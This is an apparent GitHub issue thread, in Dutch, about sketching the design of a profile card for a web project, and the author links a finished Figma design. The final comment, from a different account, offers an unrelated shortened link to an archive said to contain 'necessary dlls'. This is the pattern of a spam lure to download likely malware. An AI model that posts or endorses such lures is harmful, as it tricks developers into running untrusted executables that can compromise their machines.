### ISSUE TITLE
ontwerp profile card

### ISSUE THREAD

**Issue by Jesse-L3** [J3SS3HVA/your-tribe-for-life-profile-card#1]
Om beeld te krijgen is het handig om eerst alvast een schets te maken voor de profile card. 

Daarin verwerk ik de content en het thema + layout

**Comment by Jesse-L3** [comment]
ontwerp af https://www.figma.com/design/KSV5vp3Hrs5BufeIzKiYQC/person?node-id=0-1&node-type=canvas&t=Ww8wGagkskEqf7fj-0

**Comment by websquadpro** [comment]
try this
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive
